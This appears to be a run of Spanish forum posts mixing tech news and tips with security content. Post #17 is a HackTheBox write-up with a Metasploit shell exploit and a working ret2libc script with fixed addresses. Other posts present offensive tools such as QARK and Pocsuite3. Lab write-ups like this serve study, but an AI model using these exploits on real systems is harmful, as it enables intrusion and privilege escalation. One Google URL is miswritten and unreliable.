Para activar un Android como llave de seguridad lo primero que tenemos que hacer es conectarlo vía Bluetooth al navegador Chrome de nuestro ordenador, para que así sirva como método para verificar inicios de sesión. Esta función es compatible por el momento con Gmail, G Suite, Google Cloud y cualquier otro servicio de cuenta de Google.



También necesitaremos habilitar el uso de nuestro smartphone Android como llave de seguridad, también tendremos que entrar a 'myaccount.google.google.com/security' y dentro del apartado de 'autenticación de dos pasos' seleccionar la opción de añadir una llave de seguridad, donde tendremos que elegir nuestro smartphone Android que anteriormente enlazamos a Chrome vía Bluetooth.

Para usarlo, nuestro Android deberá tener al menos la versión 7.0 del operativo y es compatible con Chrome ya sea en Windows o macOS. Además, necesitaremos que nuestro ordenador cuente con conexión Bluetooth. Gracias al chip Titan M, los propietarios de un Pixel 3 podrán usar el botón de volumen para aprobar los inicios de sesión, mientras que el resto de los usuarios de Android tendrán que iniciar sesión en una ventana y pulsar un botón en pantalla.

Para esta función, Google menciona que hace uso de los estándares de autenticación FIDO y WebAuthn, que sirven para verificar que estamos en el sitio correcto y no existe riesgo de phishing. Por el momento sólo está disponible para smartphone Android y en inicios de sesión de servicios de Google, pero la compañía mencionó que ya trabajan con otros servicios que usan el estándar FIDO para añadirlos en un futuro al soporte de llave de seguridad vía Android.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#15

Desde hace unos meses algunos lectores de MuyLinux y personas que me siguen por Twitter me preguntan sobre esa nubecilla azul que aparece en la bandeja del sistema de las distintas distribuciones que he ido utilizando. La respuesta es pCloud, un servicio de almacenamiento en la nube radicado en Suiza.

Yo era cliente de pago de Dropbox, pero la limitación de solo soportar EXT4 descartando BTRFS y XFS me motivó a darme de baja y buscar una alternativa que satisficiera mis necesidades. Tras diversas recomendaciones, me decidí por probar pCloud, y la verdad es que la transición me supuso un reto desde el principio. Primero porque el soporte para GNU/Linux se hace mediante un paquete AppImage y no mediante Deb y/o RPM. El inconveniente de esto es que la aplicación podría no integrarse correctamente en el sistema, cosa que afortunadamente no pasa. A lo expuesto hasta aquí se suma el hecho de que puede funcionar en cualquier distribución, aunque aparentemente parece tener el foco puesto en Ubuntu.

Tras iniciar sesión por primera vez vi que no se sincronizaba con una carpeta local por defecto, sino que montaba una unidad (como un pendrive) que era el almacenamiento en la nube. Sin embargo, esto no quiere decir que el cliente de pCloud no soporte la mencionada característica, ya que cuenta con una sección que permite establecer los directorios que se quieren sincronizar.

Planes
pCloud tiene dos tipos de planes para sus clientes: anuales y para toda la vida (del servicio). De los primeros hay dos posibilidades, una es pagar 3,99 euros al mes (47,88 euros al año) con 500 GB de almacenamiento, 500 GB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje, mientras que la segunda ofrece por 7,99 euros al mes (95,88 euros al año) 2 TB de almacenamiento, 2 TB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje.



Los planes vitalicios son más caros, pero merecen la pena, ya que mediante un solo pago se puede disfrutar mientras exista el servicio de una capacidad de almacenamiento bastante grande. El primero cuesta 480 euros (ahora 175 euros gracias a un descuento del 65%) y ofrece 500 GB de almacenamiento, 500 GB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje, mientras que el segundo cuesta 980 euros (ahora 350 euros gracias a un descuento del 65%) y ofrece 2 TB de almacenamiento, 2 TB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje.



Como se puede observar, la propia web de pCloud recomienda los planes de por vida, y es que a la larga salen mucho más económicos. Personalmente, aproveché el pasado verano un descuento para obtener un Plan Premium de por vida por tan solo 175 euros. Con 500GB tengo capacidad más que de sobra para lo que necesito.

El cifrado de ficheros se tiene que contratar aparte

pCloud soporta cifrado de los ficheros, pero se tiene que adquirir aparte del almacenamiento, lo que supone un gasto adicional. Pese a ello, posiblemente esta característica no sea necesaria para la mayoría de los usuarios, estando orientada sobre todo a empresas y personas que manejen datos realmente sensibles o críticos.

El servicio de cifrado de ficheros, cuyo nombre es Crypto, puede ser contratado mediante planes de 4,99 euros al mes, 47,88 euros al año (con 20% de descuento) o 480 euros (ahora 125 euros gracias a un fuerte descuento) de por vida, ofreciendo 14 días de prueba para los indecisos.



El cliente, el talón de aquiles de pCloud
El cliente es posiblemente el gran talón de aquiles de pCloud, al menos de cara a los usuarios de GNU/Linux, habiendo probado la aplicación en Ubuntu, KDE neon, Fedora y openSUSE Leap (esta última con XFCE solo).

Como ya he dicho al principio, se trata de una aplicación AppImage, lo que facilita su ejecución en distribuciones que no sean Ubuntu (la mejor soportada por parte de terceros de largo). Sin embargo, esta no parece estar lo suficientemente pulida, ya que he tenido que soportar algunos bugs molestos como la no posibilidad de acceder a la interfaz gráfica (apareciendo una ventana en blanco que no me permitía acceder a las opciones), aunque pese a ello sincronizaba correctamente.

Los otros problemas que he encontrado han sido tras actualizar el propio cliente, obteniendo, al menos aparentemente, una configuración de usuario corrupta que no me permitía utilizar correctamente la aplicación. En esas ocasiones he tenido que matar los procesos relacionados con el cliente, borrar toda la configuración de usuario de pCloud (que se localiza en "/home/tuusuario/.pcloud" y "/home/tuusuario/.config/pcloud", teniéndose que borrar dichos subdirectorios) y volver a iniciar el servicio desde el propio paquete AppImage partiendo desde cero (no es necesario borrar las carpetas locales sincronizadas).

Por otro lado, a veces noto cierto retraso cuando coloco un fichero en la carpeta local, ya que el cliente de pCloud tarda un poco en empezar a sincronizarlo hacia el almacenamiento en la nube correspondiente a mi cuenta personal.

Quitando los mencionados inconvenientes, el cliente de pCloud resulta bastante competente y sobre todo flexible. Se integra perfectamente en GNOME, Plasma 5 (aunque usando el diálogo de GNOME) y XFCE, siendo capaz de iniciarse junto con la sesión del usuario sin ningún problema.



pCloud, un gran servicio con un cliente mejorable
Más allá de los problemas que he detectado en su cliente para GNU/Linux, pCloud se muestra como un servicio muy competente, ya que de momento no he notado ninguna pérdida de ficheros, lo que muestra que trabaja de forma correcta a la hora de sincronizar y que los inconvenientes se localizan todos en el propio cliente.

Viendo que muchas compañías pasan olímpicamente de dar soporte a GNU/Linux a pesar de que en los últimos años ha conseguido penetrar bastante en los escritorios profesionales, pCloud se convierte en una gran opción en circunstancias concretas.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#16


YouTube ya permite visualizar vídeos en ventana flotante sin una suscripción de pago.

Hace un tiempo llegó al mercado YouTube Premium. Este servicio engloba acoge también a YouTube Music y ofrece uno de los servicios streaming más completos del mercado. Uno de los beneficios de pagar la suscripción es poder ver vídeos en ventana flotante. Sí, lo que Google apodó como Picture in Picture. Esta característica también la vieron algunos usuarios de Estados Unidos con cuentas normales, es decir, sin pagar. Ahora parece que YouTube está llevando esta característica a otros países del globo. Es una gran noticia, pues visualizar contenido en ventana flotante te permite realizar otras acciones en el móvil mientras ves ese contenido.

YouTube Premium permite incluso reproducir contenido en segundo plano escuchando solo el audio. Esto no está disponible de forma gratuita, pues es una de las ventajas más importantes por las que los usuarios pagan una cuota mensual a YouTube. Si tienes una cuenta gratuita hay muy pocas probabilidades de que algún día puedas reproducir contenido en segundo plano. Eso sí, la cosa cambia con la ventana flotante.

La reproducción en ventana flotante sale de Estados Unidos


Parece que algunos usuarios han comenzado a reportar que la función de ventana flotante está disponible en sus países. Hablamos de cuentas gratuitas por las que los usuarios no pagan nada. Esto es lo mismo que hace un tiempo permitió YouTube en EEUU, pero llevado a más países de todo el globo. Los primeros indicios parecen llegar de Italia, donde algunos usuarios ya están pudiendo ver contenido en ventana flotante sin necesidad de pagar.

Esta característica permite a los usuarios poder navegar por Chrome o hablar por WhatsApp mientras ven un vídeo de YouTube. No se trata de reproducción en segundo plano, pero casi. En todo momento tendrás que estar viendo el contenido en vídeo, pero no a pantalla completa. Es algo parecido a lo que hace YouTube dentro de su propia aplicación: te permite minimizar el vídeo para seguir navegando por la interfaz.

Estamos deseando ver que esta opción se extiende. Por el momento YouTube no se ha pronunciado, por lo que habrá que esperar para conocer más detalles. Puede que haya sido una simple prueba, un error de la aplicación o algo intencionado que se está implantando en más mercados.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#17
Hacking / WriteUp – Frolic (HackTheBox)
Abril 08, 2019, 12:04:19 AM
En este post haremos la máquina Frolic de HackTheBox.
Es una máquina Linux de nivel medio que nos ayudará a aprender sobre el desarrollo de exploits para binarios con NX pero sin ASLR, es decir ret-2-libc.

Write-Up
Enumeración
Como siempre, lo primero sera un escaneo de todos los puertos con nmap:

Código: text
1	nmap -sC -sV 10.10.10.111






Como veis, hay un SSH, un SMB y un HTTP.
Vamos a enumerar la web con dirsearch recursivamente.

Código: text
1	dirsearch -u http://frolic.htb:9999/ -r -e php -t 50 -x 403






Accediendo aNo tienes permitido ver enlaces. Registrate o Entra a tu cuentavemos un código Okk!

En No tienes permitido ver enlaces. Registrate o Entra a tu cuenta encontramos un base64 que tras decodificarlo vemos que es un ZIP con contraseña.

Podemos hacerle fuerza bruta al zip con fcrackzip:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

El ZIP contiene un fichero index.php que es un hexadecimal. Pasamos el hexadecimal a ascii obteniendo un base64 que contiene un código brainfuck.

Tras decodificar el Brainfuck, obtenemos: idkwhatispass
Revisando los resultados del Dirsearch vemos que hay un http://frolic.htb/dev/backup

Mediante las credenciales admin:idkwhatispass podremos acceder al playsms.

Explotación
El PlaySMS es vulnerable, podremos obtener shell mediante un módulo de metasploit: multi/http/playsms_uploadcsv_exec

Código: text
123456	use multi/http/playsms_uploadcsv_execset rhosts 10.10.10.111set lhost tun0set rport 9999    set targeturi /playsms/set password idkwhatispass


Post-Explotación
Para acceder al usuario root tendremos que ser capaces de desarrollar un exploit para un binario con el bit NX activo pero sin ASLR en el sistema. Yo usaré la técnica ret2libc.

Lo primero es buscar binarios con el bit SUID activo utilizando el comando find:
Código: text

1 find / -perm -4000 2>/dev/null


Encontramos el binario: /home/ayush/.binary/rop que pertenece al usuario root.
ASLR desactivado:

Código: text

1 cat /proc/sys/kernel/randomize_va_space


Como veíaimos en la guia de ret-2-libc: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, necesitamos la longitud de nuestro relleno y las direcciones de system, exit y /bin/sh en la biblioteca libc.
Vamos a hacernos una plantilla que iremos completando:

Código: text
123456789101112	import struct def m32(dir):return struct.pack("I",dir) padding =base =sys = m32(base + )exit = m32(base + )binsh = m32(base + ) print padding + sys + exit + binsh


Busquemos la longitud de nuestro relleno con msf-pattern:

La longitud de nuestro relleno será 52 bytes, busquemos las direcciones de la biblioteca libc, de system, de exit y de /bin/sh.

Nuestro exploit será:
Código: text
123456789101112	import struct def m32(dir):return struct.pack("I",dir) padding = "A" * 52base = 0xb7e19000sys = m32(base + 0x0003ada0)exit = m32(base + 0x0002e9d0)binsh = m32(base + 0x15ba0b) print padding + sys + exit + binsh


Ejecutemoslo:
Código: text
1	./rop $(python /tmp/exploit)


Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#18
Quick  Android  Review  Kes (QARK)

Q RÁPIDO  A ndroid  R eview  K ella – Esta herramienta está diseñada para buscar varias vulnerabilidades de las aplicaciones relacionadas con la seguridad de Android, ya sea en código fuente o APK envasados. La herramienta también es capaz de crear APKs y / o comandos desplegables de "Prueba de concepto", capaces de explotar muchas de las vulnerabilidades que encuentra. No es necesario rootear el dispositivo de prueba, ya que esta herramienta se enfoca en las vulnerabilidades que pueden ser explotadas en condiciones de seguridad.

QARK es fácil de usar, una herramienta capaz de encontrar vulnerabilidades de seguridad comunes en las aplicaciones de Android. A diferencia de los productos comerciales, es 100% de uso gratuito. QARK presenta información educativa que permite a los revisores de seguridad localizar explicaciones precisas y detalladas de las vulnerabilidades. QARK automatiza el uso de múltiples descompiladores, aprovechando sus salidas combinadas, para producir resultados superiores, al descompilar APKs. Finalmente, la principal ventaja que QARK tiene sobre las herramientas tradicionales, que solo le apuntan a posibles vulnerabilidades, es que puede producir comandos ADB, o incluso APK completamente funcionales, que convierten vulnerabilidades hipotéticas en explotaciones "POC" de trabajo.

Incluidos en los tipos de vulnerabilidades de seguridad que esta herramienta intenta encontrar son:

Componentes exportados inadvertidamente
Componentes exportados incorrectamente protegidos
Intenciones que son vulnerables a la intercepción o espionaje
Validación incorrecta del certificado x.509
Creación de archivos de lectura mundial o de escritura mundial.
Actividades que pueden filtrar datos.
El uso de intenciones pegajosas
Inesperadamente creadas intenciones pendientes
Envío de intenciones de transmisión inseguras.
Claves privadas incrustadas en la fuente.
Uso de criptografía débil o impropio.
Configuraciones de WebView potencialmente explotables
Actividades preferidas exportadas
Robo de pata
Aplicaciones que permiten realizar copias de seguridad.
Aplicaciones que son depurables
Aplicaciones compatibles con versiones de API obsoletas, con vulnerabilidades conocidas

Instalación:
Código: text
~ git clone https://github.com/linkedin/qark
~ cd qark
~ pip install -r requirements.txt
~ pip install . --user  # --user is only needed if not using a virtualenv


Uso:
Código: text
To run in interactive mode:
$ python qarkMain.py
To run in headless mode:

$ python qarkMain.py --source 1 --pathtoapk /Users/foo/qark/sampleApps/goatdroid/goatdroid.apk --exploit 1 --install 1
or
$ python qarkMain.py --source 2 -c /Users/foo/qark/sampleApps/goatdroid/goatdroid --manifest /Users/foo/qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml --exploit 1 --install


Fuente:  No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#19
Samsung lanza One Hand Operation, una aplicación para manejar tu teléfono Android con una mano. Y para ser más concretos, con un solo pulgar.

Hay dos clases de usuarios de teléfono móvil. Quienes lo utilizan con una mano y quienes lo hacen con dos manos. Los segundos son mayoría, más que nada porque muchas funciones, aplicaciones y juegos requieren ambas manos para ser usadas.

Quienes emplean una mano, cada vez lo tienen más complicado, por lo comentado antes y porque las pantallas son más grandes con cada nuevo modelo. ¿Cómo resolver este problema?

Una posibilidad consiste en instalar One Hand Operation +, una aplicación oficial de Samsung pensada para facilitar el manejo de tu smartphone Android con una mano.



Si bien algunos modelos Samsung ya cuentan con una función similar, que encontraremos en Ajustes buscando "modo operación con una mano" y que consiste en reducir el tamaño de la pantalla para facilitar su manejo con un pulgar, esta app móvil para Android va más allá.

En concreto, One Hand Operation + aprovecha gestos con nuestro dedo pulgar de izquierda a derecha o de derecha a izquierda para así ejecutar determinadas acciones que, de otra manera, deberíamos activar mediante ambos pulgares.

Izquierda, derecha y más


Una vez hemos instalado y activado One Hand Operation +, ya podemos configurar qué gestos y acciones queremos emplear.

Los gestos se pueden realizar de izquierda a derecha o de derecha a izquierda. A partir de ahí, distintos gestos nos permitirán configurar diferentes actividades. Por un lado, podemos deslizar el pulgar de un lado a otro de la pantalla de manera corta o larga. Y a su vez, el deslizamiento puede ser en línea recta, en diagonal hacia arriba o en diagonal hacia abajo. En total, doce acciones posibles que podemos o no activar o desactivar.

En cuanto a las acciones que se pueden asociar a los doce gestos mencionados, incluye el botón Home, el botón Reciente y Atrás, el botón de Menú, podemos activar la aplicación que hemos visto previamente, hacer una captura de pantalla, volver atrás en el navegador web, abrir el panel de notificaciones o los ajustes rápidos de Android sin necesidad de estirar el pulgar hacia la parte superior de la pantalla.



Más opciones interesantes. Desde el menú de opciones avanzadas o Advanced settings (Ajustes avanzados) es posible activar funciones prácticas como que estos gestos funcionen también si tenemos el smartphone en posición horizontal o apaisada o configurar una lista de aplicaciones y juegos que no harán caso a los gestos, muy útil en el caso de apps que emplean gestos propios. Así no habrá problemas entre unos y otros.

Los responsables de la aplicación One Hand Operation + recomiendan empezar a usar los gestos básicos o cortos. Una vez nos hayamos acostumbrado, podremos activar también los gestos largos, más avanzados. Para ello sólo tenemos que abrir la app e ir a Left handle (Controlador izquierdo) o Right handle (Controlador derecho) respectivamente para activar o desactivar los gestos largos pulsando en el botón al lado de Long Swipe (Deslizamiento largo).

Otro elemento a configurar son los indicadores de los gestos, que suelen ser pequeños por defecto y prácticamente invisibles. Por nuestra parte, podemos regular el nivel de transparencia y el tamaño de los iconos o indicadores.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#20
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta. Así se ha denominado a la primera certificación técnica profesional española en criptografía.


De la mano de CriptoCert S.L., compañía española recientemente fundada y focalizada en la promoción, difusión, educación, capacitación técnica y certificación de profesionales en el campo de la criptografía y protección de la información, así como de su aplicación en el mundo real, nace CriptoCert Certified Crypto Analyst, la primera certificación técnica profesional de criptografía y protección de la información en español, que cuenta además con el reconocimiento del Centro Criptológico Nacional (CCN), centro responsable de la seguridad y protección de las comunicaciones de las administraciones públicas en España (adscrito al Centro Nacional de Inteligencia, CNI).

El objetivo principal de esta certificación es capacitar y acreditar de manera rigurosa a profesionales mediante contenidos técnicos extensos, detallados y actualizados. Como segundo objetivo, se plantea la difusión del uso de la criptografía y su utilización práctica, lo que se conoce como criptografía aplicada. Dado que uno de los fundamentos de la criptografía son las matemáticas, y aunque la certificación estudia los conceptos y principios matemáticos necesarios para comprender el funcionamiento de múltiples sistemas y protocolos criptográficos, y en cómo aplicar la criptografía de forma práctica en numerosos escenarios desde el punto de vista de la ingeniería, evita lo más posible profundizar en esa faceta más teórica.

En resumen, la ambición de esta innovadora iniciativa española es extender los complejos conocimientos vinculados al mundo de la criptología a un mayor número de profesionales de una manera clara y entendible, para que dispongan de las capacidades de análisis y comprensión de los elementos criptográficos, de cara a su aplicación en la protección de soluciones y entornos tecnológicos.

Hoy en día, la criptografía no sólo es una moda: ejemplos significativos de su utilización están presentes en el día a día en múltiples sistemas, aplicaciones, protocolos, comunicaciones, arquitecturas y dispositivos. Y es menester que los técnicos, ingenieros e incluso directivos de empresas, organizaciones, administración pública y otros entornos civiles o militares, conozcan cómo funciona la criptografía y sepan de sus fortalezas y de sus debilidades.

La certificación está dirigida preferentemente a:

Estudiantes de cursos y másteres tecnológicos
Estudiantes universitarios de carreras técnicas
Fuerzas y cuerpos de seguridad del Estado
Especialistas en seguridad informática
Responsables y directivos encargados de la protección de datos
Arquitectos de soluciones criptográficas
Especialistas en criptomonedas y blockchain
Programadores y desarrolladores de aplicaciones y software
Ingenieros de hardware
Profesionales de tecnologías de la información y comunicaciones

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#21
El Consejo Profesional de Ingeniería de Telecomunicaciones, Electrónica y Computación - COPITEC, invita a los lectores de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta a participar de su próximo curso, poniendo a disposición de los interesados, un descuento especial. Este beneficio consiste en la posibilidad de inscribirse en el Curso de Informática Forense con precio especial (30% de descuento sobre el valor no matriculado), mencionando a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.

Todas las consultas sobre inscripción deben realizarse al siguiente correo electrónico:
actualizacion_profesional[arroba]copitec.org.ar

Info forenseNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Objetivos
Lograr que el profesional se inicie en el mundo de la Informática Forense, para que puedan efectuar pericias en el ámbito judicial y/o tareas investigativas ante un fraude en una organización.

Dirigido a
Profesionales vinculados con la Tecnología de la Información que pretendan iniciarse en el mundo de la Informática Forense
Especialmente destinado a peritos que se inician y no tienen experiencia o poseen escasos conocimientos técnicos sobre métodos y procedimientos técnicos para efectuar pericias informáticas.

Modalidad
Presencial y distancia

Duración
18 horas distribuidas en 6  clases de 3hs. cada una

Días y horarios
Martes y Jueves desde el 23 de abril al 9 de mayo de 2019 de 18 a 21 hs.

Inscribite a este curso y accede a un descuento de 30% de descuento sobre el valor no matriculado mencionando a nuestro blog y a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.

Más información sobre el curso Informática Forense bajo entorno Windows en la web de COPITEC No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#22


Mejorar el rendimiento de Windows 10 es una tarea muy fácil que además podemos conseguir sin tener que gastar dinero en mejorar nuestro PC. El nuevo sistema operativo de Microsoft cuenta con una optimización bastante buena y no requiere de una gran cantidad de recursos para funcionar correctamente, pero es cierto que en configuraciones muy modestas puede acabar dando algunos problemas.

En este tutorial os vamos a enseñar paso a paso cómo podéis mejorar el rendimiento de Windows 10 al instante, de forma sencilla y sin tener correr ningún tipo de riesgo. Poneos cómodos, que empezamos.

Mejorar el rendimiento de Windows 10: plan de energía



El primer paso para mejorar el rendimiento de Windows 10 pasa por utilizar un plan de energía de alto rendimiento. Es muy fácil:

En la barra de búsqueda de Cortana escribe "Editar Plan de Energía" y selecciona el primer resultado.
Una vez dentro elige la opción "Cambiar la Configuración Avanzada de Energía".
Puedes seleccionar el plan de alto rendimiento, que viene por defecto con una configuración determinada, personalizar tu propio plan.

Mejorar el rendimiento de Windows 10: deshabilitar efectos y animaciones


Es una solución que puede complementar a la anterior, aunque también funciona de manera independiente. Reduce las "florituras" gráficas y a nivel de interfaz visual para mejorar el rendimiento. Estos son los pasos a seguir:

Pulsamos al mismo tiempo "Windows + R" para abrir la ventana "Ejecutar".
En el espacio de aquella escribimos, sin comillas, el comando "sysdm.cpl".
Ahora estamos en "Propiedades del Sistema", donde deberemos ir a "Opciones Avanzadas" y "Configuración", dentro de la categoría "Rendimiento".
Por último seleccionamos la opción "Ajustar para Obtener el Mejor Rendimiento".

Mejorar el rendimiento de Windows 10: reducir programas de inicio


Nos ayudará a reducir el tiempo de inicio del sistema. Es una medida pensada para complementar a las dos anteriores. Estos son los pasos que debemos dar:

Pulsamos "control + alt + suprimir" para abrir el "Administrador de Tareas".
Nos vamos a "Inicio" y seleccionamos los programas que queremos deshabilitar haciendo clic en ellos con el botón derecho del ratón.
Los programas de inicio pueden tener un impacto bajo, medio o alto en el tiempo de arranque, así que deshabilitar unos u otros puede tener un resultado diferente.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#23
Evolución:
Es bastante complicado para un pentester realizar un escaneado de herramientas de borrachera ( ejecutando herramientas de escaneo de seguridad una tras otra ) sin automatización. A menos que usted sea un profesional en la automatización de tareas, es una tarea muy importante realizar un escaneo en exceso para cada compromiso. El objetivo final de este programa es resolver este problema a través de la automatización; verbigracia. ejecutar múltiples herramientas de exploración para descubrir vulnerabilidades, juzgar efectivamente los falsos positivos, correlacionar colectivamente los resultados y ahorra un tiempo precioso ; todo esto bajo un mismo techo.

Características:
Instalación en un solo paso .
ejecuta una multitud de herramientas de análisis de seguridad , realiza otras comprobaciones personalizadas e imprime los resultados de forma espontánea .
Algunas de las herramientas incluyen nmap, dnsrecon, wafw00f, uniscan, sslyze, fierce, lbd, theharvester, dnswalk, golismero etc. nmap, dnsrecon, wafw00f, uniscan, sslyze, fierce, lbd, theharvester, dnswalk, golismero bajo una sola entidad.
¡Ahorra mucho tiempo, de hecho mucho tiempo! .
comprueba las mismas vulnerabilidades con múltiples herramientas para ayudarlo a concentrarse en falsos positivos de manera efectiva.
Leyendas para ayudarlo a comprender qué pruebas pueden tomar más tiempo, por lo que puede Ctrl+C para omitirlas si es necesario.
asociación con OWASP Top 10 2017 en la lista de vulnerabilidades descubiertas. ( en desarrollo )
Clasificación crítica, alta, media, baja e informativa de vulnerabilidades.
las definiciones de vulnerabilidad le orientan sobre la vulnerabilidad real y la amenaza que puede representar. ( en desarrollo )
remediations le dice cómo conectar / arreglar la vulnerabilidad encontrada. ( en desarrollo )
El resumen ejecutivo le brinda un contexto general de la exploración realizada con problemas críticos, altos, bajos e informativos descubiertos. ( en desarrollo )
Inteligencia artificial para desplegar herramientas automáticamente dependiendo de los problemas encontrados. por ejemplo; automatiza el lanzamiento de las herramientas wpscan y plecost cuando se encuentra una instalación de wordpress. ( en desarrollo )
Informe detallado en un formato de documento portátil (* .pdf) con detalles completos de las exploraciones y herramientas utilizadas. ( en desarrollo )

Para tu información:

El programa aún está en desarrollo, funciona y actualmente admite 80 pruebas de vulnerabilidad.
El procesamiento paralelo aún no está implementado, puede codificarse a medida que se introducen más pruebas.

Controles de vulnerabilidad:
Balanceadores de carga DNS / HTTP y firewalls de aplicaciones web.
Verificaciones de Joomla, WordPress y Drupal
Vulnerabilidades relacionadas con SSL ( HEARTBLEED, FREAK, POODLE, CCS Injection, LOGJAM, OCSP Stapling ).
Puertos comúnmente abiertos.
Transferencias de zona DNS utilizando múltiples herramientas ( Fierce, DNSWalk, DNSRecon, DNSEnum ).
Subdominios de fuerza bruta.
Abrir el directorio / archivo de fuerza bruta.
Shallow XSS, SQLi y Banners BSQLi.
Slow-Loris DoS Attack, LFI ( inclusión de archivos locales ), RFI ( inclusión de archivos remotos ) y RCE ( ejecución remota de código ).
y más por venir ...

Requerimientos:
Python 2.7
Kali OS ( preferido , ya que se envía con casi todas las herramientas )
Para otros sabores de SO, trabajar en un soporte de docker. Aférrate.

Uso:
Descarga el script y otorga permisos ejecutables.
Código: text
wget -O rapidscan.py https://raw.githubusercontent.com/skavngr/rapidscan/master/rapidscan.py && chmod +x rapidscan.py


Ayuda:


Salida:




Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#24
    Pocsuite3 es un marco de prueba de vulnerabilidad remota y desarrollo de prueba de concepto abierto desarrollado por el equipo Knownsec 404 . Viene con un potente motor de prueba de concepto, muchas funciones potentes para los probadores de penetración y los investigadores de seguridad.

Caracteristicas


  • PoC guiones pueden correr con attack, verify, shellel modo en forma diferente
    Ecosistema de plugin
  • Guión de PoC de carga dinámica desde cualquier lugar (archivo local, redis, base de datos, Seebug ...)
  • Cargue multi-target desde cualquier lugar (CIDR, archivo local, redis, base de datos, Zoomeye, Shodan ...)
  • Los resultados pueden ser fácilmente exportados
  • Peticiones dinámicas de parche y gancho
  • Tanto la herramienta de línea de comandos como el paquete python se importan para usar
  • Soporte de IPV6
  • Soporte global HTTP / HTTPS / SOCKS proxy
  • API de araña simple para usar el script PoC
  • Integrar con Seebug (para cargar PoC desde el sitio web de Seebug)
  • Integrar con ZoomEye (para el objetivo de carga de ZoomEye Dork)
  • Integrar con Shodan (para el objetivo de carga de Shodan Dork)
  • Integrar con Ceye (para verificar solicitudes ciegas de DNS y HTTP)
  • Depuración amigable de las secuencias de comandos PoC con IDE
    Más ...

Capturas de pantalla delmodo consola de pocsuite3.


Modo pocsuite3 shell


pocsuite3 carga PoC de Seebug


pocsuite3 carga multi-objetivo desde ZoomEye


pocsuite3 carga multi-objetivo de Shodan


Requerimientos


  • Python 3.4+
  • Funciona en Linux, Windows, Mac OSX, BSD.

Instalación de forma rápida:
[/list]
Código: text
$ pip install pocsuite3


O haga clic en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta para descargar el último archivo zip fuente y extraerlo.

Código: text
$ wget https://github.com/knownsec/pocsuite3/archive/master.zip
$ unzip master.zip


La última versión de este software está disponible en: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Documentación
La documentación está disponible en el directorio english docs.
En English: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Descargar Pocsuite3: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#25
Un equipo nuevo cuanto mas rápido trabaja utiliza toda la capacidad del hardware y eso hace que más rápido se desgaste la energía que está en la bateria.Cuando usted reduce el potencial del procesador, puede hacer que la carga de su batería rinda mas.

Recuerde que si el equipo se expone a altas temperaturas de manera constante la bateria ion litio se desgastará de manera mas rápida hasta deteriorarse completamente.

Es necesario que aplique pasta termica arctic silver 5 en el procesador.

Quizá a muchos usuarios se les ha presentado el problema en la bateria y calentamiento excesivo para este tipo de ordenadores dedicados al gaming y el siguiente método también puede ser aplicable en mas equipos.

Para ello,realice lo siguiente:

1-Aun lado del símbolo de Windows,escriba Panel de control.


2-En el panel de control,utilice el buscador que está en la parte superior al lado derecho y busque Opciones de energía.


3-Seleccione Cambiar la configuración de la batería.


4-Haga clic en Crear un plan de energía.


5-Seleccione el Recomendado por Hp y si usted desea puede agregar otro nombre al nuevo nombre del plan,para que después haga clic en Siguiente.

6-En la siguiente sección de clic en Crear.


7-Después va a Cambiar la configuración del plan nuevo.


8-Haga clic en Cambiar la configuración avanzada de energía .


9-En la nueva ventana llamada Configuración avanzada,busque Administración de energía del procesador y dirígase a donde dice Estado máximo del procesador para que por último en Con bateria cambie el porcentaje y ponga aproximadamente un 30 % , por ultimo de clic en Aplicar y Aceptar.


*****************************************************************************************
Preguntas que les puede surgir.

1-¿Se puede poner hasta 0 %?
Si es posible,y lo único es que el rendimiento baja pero no es problema para navegar y hacer tareas donde no consuma muchos recursos.

2-¿Cuantas horas o minutos duraría mas la batería?
En algunos equipos puede rendir de una hora a dos mas aproximadamente.

#26
Presentaciones y cumpleaños / Hola.
Mayo 14, 2018, 11:35:23 PM
Espero ayudar en este foro.
Saludos a todos!
#27
Primero, diríjase a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y obtenga la herramienta de descarga ISO de Microsoft Windows y Office . Es gratis y es una herramienta portátil, por lo que no hay instalación. Solo ejecuta el archivo ejecutable. En la ventana principal, elija la versión de Windows u Office que desea descargar.

Puede descargar la herramienta desde: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Haga clic en el menú desplegable "Seleccionar edición" y luego elija la edición que desee. Tenga en cuenta que además de las ediciones regulares del producto (como Home o Professional), también puede descargar ediciones específicas de regiones como Windows N (que se vende al mercado europeo y no incluye aplicaciones multimedia como Media Player y DVD Maker). ) y Windows K (que se vende al mercado coreano).


Después de seleccionar la edición que desea descargar, haga clic en "Confirmar".


A continuación, use el menú desplegable que aparece para elegir el idioma del producto que desea descargar y luego haga clic en el botón "Confirmar" debajo del menú desplegable de idiomas.


